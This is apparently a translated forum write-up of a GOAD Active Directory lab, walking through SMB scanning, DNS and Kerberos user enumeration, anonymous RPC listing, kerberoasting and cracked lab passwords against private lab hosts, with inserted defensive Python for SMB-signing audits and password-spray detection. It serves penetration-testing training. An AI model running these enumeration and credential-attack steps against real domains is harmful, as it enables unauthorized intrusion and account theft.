[Original] AD Domain Lab -- GOAD-01
Posted on: 2023-9-13 20:21 2218


Project: https://github.com/Orange-Cyberdefense/GOAD

This post only covers part of the lab; the rest will follow in a later update.

After the lab is set up, the topology looks like this:

[screenshot: v2_overview.png]

Next, the corresponding penetration steps are carried out following the domain penetration mind map.

[screenshot]

Scan with cme (crackmapexec); the NetBIOS results give the IP, hostname and domain of each machine (the full output is in the command listing at the end of the post):

[screenshot]

Three domains were found; details below:

There are 3 domains, so there are three domain controllers. Microsoft sets SMB signing to True on DCs by default. (This may not hold in a real environment, where other means are needed to confirm the DC's IP.)

[screenshot]
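As an added example (not from the original post), the following Python parses the cme smb lines quoted in this post and applies the post's heuristic: domain-joined hosts that require SMB signing are DC candidates, while members that do not require signing (NTLM relay exposure) and hosts with SMBv1 enabled are listed for remediation. The sample input is the post's own cme listing, embedded inline; nothing else is assumed.

```python
import re

# Constructed sample: the cme smb lines quoted in this post (lab range 192.168.56.0/24).
CME_OUTPUT = """\
SMB         192.168.56.22   445    CASTELBLACK      [*] Windows 10.0 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False)
SMB         192.168.56.1    445    PC-20230407XQYM  [*] Windows 10.0 Build 18362 x64 (name:PC-20230407XQYM) (domain:PC-20230407XQYM) (signing:False) (SMBv1:False)
SMB         192.168.56.23   445    BRAAVOS          [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True)
SMB         192.168.56.11   445    WINTERFELL       [*] Windows 10.0 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB         192.168.56.12   445    MEEREEN          [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True)
SMB         192.168.56.10   445    KINGSLANDING     [*] Windows 10.0 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False)
"""
# One cme "SMB" banner line: ip, port, hostname, OS banner and the four bracketed attributes.
LINE_RE = re.compile(
    r"^SMB\s+(?P<ip>\d+\.\d+\.\d+\.\d+)\s+\d+\s+(?P<host>\S+)\s+\[\*\]\s+(?P<os>.*?)\s+"
    r"\(name:(?P<name>[^)]*)\)\s+\(domain:(?P<domain>[^)]*)\)\s+"
    r"\(signing:(?P<signing>True|False)\)\s+\(SMBv1:(?P<smbv1>True|False)\)"
)

def parse_cme(text):
    """Return one dict per parsed banner line; unparseable lines are skipped."""
    hosts = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        h = m.groupdict()
        h["signing"] = h["signing"] == "True"
        h["smbv1"] = h["smbv1"] == "True"
        # A non-joined machine reports its own name as the domain (the host PC here).
        h["joined"] = h["domain"].lower() != h["name"].lower()
        hosts.append(h)
    return hosts

def audit(hosts):
    """Apply the post's heuristic (DCs require signing by default) and list exposures."""
    dc_candidates = {}
    for h in hosts:
        if h["joined"] and h["signing"]:
            dc_candidates.setdefault(h["domain"], []).append(h["ip"])
    return {
        "dc_candidates": dc_candidates,  # confirm with DNS SRV lookups, as the post does
        "signing_not_required": sorted(h["ip"] for h in hosts if h["joined"] and not h["signing"]),
        "smbv1_enabled": sorted(h["ip"] for h in hosts if h["smbv1"]),
        "not_joined": sorted(h["ip"] for h in hosts if not h["joined"]),
    }

if __name__ == "__main__":
    for key, value in audit(parse_cme(CME_OUTPUT)).items():
        print(f"{key}: {value}")
```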

Use nslookup to query the DNS SRV records and enumerate the DC IPs

[screenshot]

This gives the following information:

north.sevenkingdoms.local

sevenkingdoms.local

essos.local

To use Kerberos on Linux, the hosts file and the krb5-user configuration need to be changed.

First, configure name resolution by editing /etc/hosts

[screenshot]

Configure it through the UI or edit the config file directly:

[screenshots]

Domain: north.sevenkingdoms.local DC: 192.168.56.11 (winterfell.north.sevenkingdoms.local) anonymous enumeration allowed

Domain: sevenkingdoms.local DC: 192.168.56.10 (kingslanding.sevenkingdoms.local) anonymous enumeration not allowed

Domain: essos.local DC: 192.168.56.12 (winterfell.north.sevenkingdoms.local) anonymous enumeration not allowed

[screenshot]

Let ChatGPT analyze it:

Conclusion: 5 failed logins within 5 minutes lock the account for 5 minutes.

![FireShot Capture 008 - password policy analysis - chat.openai.com](https://images-f.oss-rg-china-mainland.aliyuncs.com/img/FireShot Capture 008 - 密码策略分析 - chat.openai.com.png)

[screenshots]
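Added example, not part of the original post: a small Python detector that applies the lockout policy concluded above (5 failures within 5 minutes, 5-minute lockout) to failed-logon records. It reports accounts that would be locked out and flags sources that spread failures across many accounts while staying under the per-account threshold, which is the footprint a password spray leaves in logs. The records are constructed inline (timestamps, source addresses, NORTH account names from the post), and the sliding window is a simplification of AD's observation-window reset.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Lockout policy as concluded in the post: 5 failures within 5 minutes lock the account for 5 minutes.
LOCKOUT_THRESHOLD = 5
OBSERVATION_WINDOW = timedelta(minutes=5)
LOCKOUT_DURATION = timedelta(minutes=5)

# Constructed failed-logon records (time, source address, target account); not real lab data.
NORTH_USERS = ["arya.stark", "eddard.stark", "catelyn.stark", "robb.stark", "sansa.stark", "brandon.stark",
               "rickon.stark", "hodor", "jon.snow", "samwell.tarly", "jeor.mormont", "sql_svc"]
BASE = datetime(2023, 8, 31, 18, 0, 0)
EVENTS = [(BASE + timedelta(seconds=i), "192.168.56.50", u) for i, u in enumerate(NORTH_USERS)]  # one try per account
EVENTS += [(BASE + timedelta(seconds=20 * i), "192.168.56.60", "hodor") for i in range(6)]       # one account, repeated
EVENTS += [(BASE + timedelta(minutes=1), "192.168.56.70", "sansa.stark")]                        # a single typo

def accounts_at_risk(events, threshold=LOCKOUT_THRESHOLD, window=OBSERVATION_WINDOW):
    """Accounts that reach the threshold inside one window -> time the lockout would end.
    Simplification: a plain sliding window instead of AD's observation-window reset."""
    per_account = defaultdict(list)
    for ts, _src, acct in events:
        per_account[acct].append(ts)
    locked = {}
    for acct, times in per_account.items():
        times.sort()
        for i in range(len(times) - threshold + 1):
            if times[i + threshold - 1] - times[i] < window:
                locked[acct] = times[i + threshold - 1] + LOCKOUT_DURATION
                break
    return locked

def spray_sources(events, min_accounts=8, threshold=LOCKOUT_THRESHOLD, window=OBSERVATION_WINDOW):
    """Sources that fail against many distinct accounts inside one window while keeping
    every account under the lockout threshold: the footprint of a password spray."""
    per_source = defaultdict(list)
    for ts, src, acct in events:
        per_source[src].append((ts, acct))
    flagged = {}
    for src, items in per_source.items():
        items.sort()
        for i, (start, _acct) in enumerate(items):
            counts = Counter(a for t, a in items[i:] if t - start < window)
            if len(counts) >= min_accounts and max(counts.values()) < threshold:
                flagged[src] = len(counts)
                break
    return flagged

if __name__ == "__main__":
    print("would lock:", accounts_at_risk(EVENTS))
    print("spray sources:", spray_sources(EVENTS))
```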

Enumerate the domain user groups to get the complete list of domain users:

[screenshots]

Normally a DC does not allow anonymous connections. In that case, passwords inside the domain can be enumerated.

[screenshot]

In the lab, the earlier anonymous user enumeration yielded one user's password, samwell.tarly:Heartsbane; with it the full user list can be retrieved

[screenshots]

Results:

[screenshots]

The usernames obtained earlier are as follows:

[screenshot]

Account obtained: brandon.stark:iseedeadpeople

[screenshot]

We now have 3 accounts in the NORTH.SEVENKINGDOMS.LOCAL domain:

Check the password status

[screenshots]

Because there are trust relationships between the domains in the forest, other domains' information can be queried via LDAP

Query user information for the north.sevenkingdoms.local domain

[screenshots]

No idea why, but the query failed..

[screenshots]

Results are saved in kerberoasting.hashes

Contents:

[screenshot]

Account obtained: jon.snow:iknownothing

[screenshots]

Results are stored in records.csv

[screenshot]

Command listings referenced in the post:

```
cme smb 192.168.56.1/24
SMB         192.168.56.22   445    CASTELBLACK      [*] Windows 10.0 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False)
SMB         192.168.56.1    445    PC-20230407XQYM  [*] Windows 10.0 Build 18362 x64 (name:PC-20230407XQYM) (domain:PC-20230407XQYM) (signing:False) (SMBv1:False) ## lab host machine, ignore
SMB         192.168.56.23   445    BRAAVOS          [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True)
SMB         192.168.56.11   445    WINTERFELL       [*] Windows 10.0 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB         192.168.56.12   445    MEEREEN          [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True)
SMB         192.168.56.10   445    KINGSLANDING     [*] Windows 10.0 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False)
```
```bash
nslookup -type=srv _ldap._tcp.dc._msdcs.sevenkingdoms.local 192.168.56.10
nslookup -type=srv _ldap._tcp.dc._msdcs.essos.local  192.168.56.10
nslookup -type=srv _ldap._tcp.dc._msdcs.north.sevenkingdoms.local  192.168.56.10
```
```
# /etc/hosts
# GOAD
192.168.56.10   sevenkingdoms.local kingslanding.sevenkingdoms.local kingslanding
192.168.56.11   winterfell.north.sevenkingdoms.local north.sevenkingdoms.local winterfell
192.168.56.12   essos.local meereen.essos.local meereen
192.168.56.22   castelblack.north.sevenkingdoms.local castelblack
192.168.56.23   braavos.essos.local braavos
```
```bash
sudo apt install krb5-user
vi /etc/krb5.conf
```
```ini
[libdefaults]
  default_realm = essos.local
  kdc_timesync = 1
  ccache_type = 4
  forwardable = true
  proxiable = true
  fcc-mit-ticketflags = true
[realms]
  north.sevenkingdoms.local = {
      kdc = winterfell.north.sevenkingdoms.local
      admin_server = winterfell.north.sevenkingdoms.local
  }
  sevenkingdoms.local = {
      kdc = kingslanding.sevenkingdoms.local
      admin_server = kingslanding.sevenkingdoms.local
  }
  essos.local = {
      kdc = meereen.essos.local
      admin_server = meereen.essos.local
  }
```
```bash
impacket-getTGT essos.local/khal.drogo:horse # test the config, assuming the password is known
export KRB5CCNAME=$(pwd)/khal.drogo.ccache  # use the TGT ticket
impacket-smbclient -k @braavos.essos.local # SMB connection

unset KRB5CCNAME # stop using the TGT ticket
```
```bash
nmap -Pn -p- -sC -sV -oA full_scan_goad 192.168.56.10-12,22-23
...
```
```bash
cme smb <dc-ip> --users
cme smb <dc-ip> --pass-pol
```
```bash
# enum4linux <dc-ip>
enum4linux 192.168.56.11
```
```bash
rpcclient -U "NORTH\\" 192.168.56.11 -N
enumdomusers
enumdomgroups
```
```bash
net rpc group members 'Domain Users' -W 'NORTH' -I '192.168.56.11' -U '%'
```
```
NORTH\Administrator
NORTH\vagrant
NORTH\krbtgt
NORTH\SEVENKINGDOMS$
NORTH\arya.stark
NORTH\eddard.stark
NORTH\catelyn.stark
NORTH\robb.stark
NORTH\sansa.stark
NORTH\brandon.stark
NORTH\rickon.stark
NORTH\hodor
NORTH\jon.snow
NORTH\samwell.tarly
NORTH\jeor.mormont
NORTH\sql_svc
```
```
robert.baratheon
tyrion.lannister
cersei.lannister
catelyn.stark
jaime.lannister
daenerys.targaryen
viserys.targaryen
jon.snow
robb.stark
sansa.stark
arya.stark
bran.stark
rickon.stark
joffrey.baratheon
jorah.mormont
theon.greyjoy
samwell.tarly
renly.baratheon
ros
jeor.mormont
gendry
lysa.arryn
robin.arryn
bronn
grand.maester
varys
loras.tyrell
shae
benjen.stark
barristan.selmy
khal.drogo
hodor
lancel.lannister
maester.luwin
alliser.thorne
osha
maester.aemon
talisa.stark
brienne.of
davos.seaworth
tywin.lannister
stannis.baratheon
margaery.tyrell
ygritte
balon.greyjoy
roose.bolton
gilly
podrick.payne
melisandre
yara.greyjoy
jaqen.h’ghar
grey.worm
beric.dondarrion
missandei
mance.rayder
tormund
ramsay.snow
olenna.tyrell
thoros.of
orell
qyburn
brynden.tully
tommen.baratheon
daario.naharis
oberyn.martell
myrcella.baratheon
obara.sand
nym.sand
tyene.sand
high.sparrow
trystane.martell
doran.martell
euron.greyjoy
lady.crane
high.priestess
randyll.tarly
izembaro
brother.ray
archmaester.ebrose
```
```bash
nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='essos.local',userdb=user_list.txt" 192.168.56.12
nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='sevenkingdoms.local',userdb=user_list.txt" 192.168.56.10
nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='north.sevenkingdoms.local',userdb=user_list.txt" 192.168.56.11
```
```
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-31 18:33 CST
Nmap scan report for essos.local (192.168.56.12)
Host is up (0.00022s latency).

PORT   STATE SERVICE
88/tcp open  kerberos-sec
| krb5-enum-users:
| Discovered Kerberos principals
|     daenerys.targaryen@essos.local
|     jorah.mormont@essos.local
|     viserys.targaryen@essos.local
|_    khal.drogo@essos.local
MAC Address: 08:00:27:E6:7A:79 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.21 seconds
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-31 18:33 CST
Nmap scan report for sevenkingdoms.local (192.168.56.10)
Host is up (0.00026s latency).

PORT   STATE SERVICE
88/tcp open  kerberos-sec
| krb5-enum-users:
| Discovered Kerberos principals
|     cersei.lannister@sevenkingdoms.local
|     tywin.lannister@sevenkingdoms.local
|     joffrey.baratheon@sevenkingdoms.local
|     robert.baratheon@sevenkingdoms.local
|     stannis.baratheon@sevenkingdoms.local
|     jaime.lannister@sevenkingdoms.local
|_    renly.baratheon@sevenkingdoms.local
MAC Address: 08:00:27:23:6C:98 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-31 18:33 CST
Nmap scan report for north.sevenkingdoms.local (192.168.56.11)
Host is up (0.00023s latency).

PORT   STATE SERVICE
88/tcp open  kerberos-sec
| krb5-enum-users:
| Discovered Kerberos principals
|     jon.snow@north.sevenkingdoms.local
|     arya.stark@north.sevenkingdoms.local
|     samwell.tarly@north.sevenkingdoms.local
|     catelyn.stark@north.sevenkingdoms.local
|     rickon.stark@north.sevenkingdoms.local
|     robb.stark@north.sevenkingdoms.local
|     sansa.stark@north.sevenkingdoms.local
|     jeor.mormont@north.sevenkingdoms.local
|_    hodor@north.sevenkingdoms.local
MAC Address: 08:00:27:91:1B:99 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds
```


Last edited by hexameron on 2023-9-13 20:36; reason: content added
Latest replies (2)
Thanks for sharing
2023-9-14 09:45
Very nice. You can also run BloodHound on a domain computer to collect AD information faster. It would be even better if this lab included different subdomains; after all, port forwarding and relay attacks matter a lot in enterprise penetration tests too.
2023-9-29 22:03